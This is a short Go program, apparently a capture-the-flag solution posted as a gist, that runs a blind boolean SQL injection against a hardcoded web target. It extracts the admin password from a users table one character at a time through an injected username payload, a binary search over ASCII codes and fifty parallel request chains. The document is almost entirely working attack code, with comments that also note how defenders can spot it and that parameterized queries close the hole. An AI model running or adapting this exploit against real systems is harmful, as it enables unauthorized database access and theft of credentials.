@Acebond
Created April 14, 2020 10:21
binary_search_SQLi
package main
import (
"bytes"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"os"
"sync"
)
// targetURL is the address every probe form is POSTed to.
var targetURL = "http://jh2i.com:50011/"

// flagLength is the number of character positions main recovers; it sizes
// the result slice and fixes how many positions are probed.
var flagLength = 50
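// testBoolean asks the target a single yes/no question: is the ASCII code of
// the character at position index of the admin password strictly greater
// than char? index is passed straight through as substr's start position.
//
// The condition travels in the username field of a form POSTed to targetURL.
// The answer is taken from the response body: it is treated as "true" only
// when the body contains the marker text "Good job".
//
// Both a failed request and a failed body read terminate the process with
// exit status 1; the function never returns an answer it could not read.
//
// Defender's view: every call is one POST whose username carries a quote, a
// nested SELECT and a trailing comment marker, so the traffic is easy to spot
// in request logs. The oracle presumably exists because the server builds its
// query by string concatenation; binding the username as a query parameter
// would remove it.
func testBoolean(index int, char int) bool {
	SQLi := fmt.Sprintf("asd' OR (ascii(substr((select password from users where username='admin'),%d,1))) > %d-- -", index, char)
	postData := url.Values{"username": {SQLi}, "password": {"asdasd"}}

	resp, err := http.PostForm(targetURL, postData)
	if err != nil {
		fmt.Printf("Error Reading HTTP Response: %s\n", err.Error())
		os.Exit(1)
	}
	defer resp.Body.Close()

	respBody, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		// A truncated body is indistinguishable from a "false" answer, which
		// would silently put a wrong character in the output. Fail the same
		// way the request error above does instead.
		fmt.Printf("Error Reading HTTP Response Body: %s\n", err.Error())
		os.Exit(1)
	}
	return bytes.Contains(respBody, []byte("Good job"))
}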
// searchFlag recovers the character at position index by bisection, using
// testBoolean(index, x) as a "value > x" comparison.
//
// Each round probes the midpoint of [low, high]. A true answer raises low to
// the midpoint and a false answer lowers high to it. Once the bounds are
// adjacent the final probe decides: true yields high, false yields low. A
// value that is not above the initial low therefore comes back as low.
//
// The caller must pass low < high; with equal bounds the search never ends.
func searchFlag(index int, low int, high int) rune {
	for {
		pivot := (low + high) / 2
		above := testBoolean(index, pivot)

		// Adjacent bounds: this probe is the last one.
		if high-low == 1 {
			if above {
				return rune(high)
			}
			return rune(low)
		}

		if above {
			low = pivot
		} else {
			high = pivot
		}
	}
}
// main recovers flagLength characters and prints them as one string.
//
// Every position is searched in its own goroutine over the printable ASCII
// bounds 32..126, so the target receives flagLength request chains in
// parallel. Each goroutine writes only its own slot of the result slice, and
// the slice is read only after all of them have finished.
func main() {
	recovered := make([]rune, flagLength)

	var pending sync.WaitGroup
	pending.Add(flagLength)
	for pos := range recovered {
		go func(slot int) {
			defer pending.Done()
			// Slots are 0-based; positions handed to searchFlag are 1-based.
			recovered[slot] = searchFlag(slot+1, 32, 126)
		}(pos)
	}

	pending.Wait()
	fmt.Println(string(recovered))
}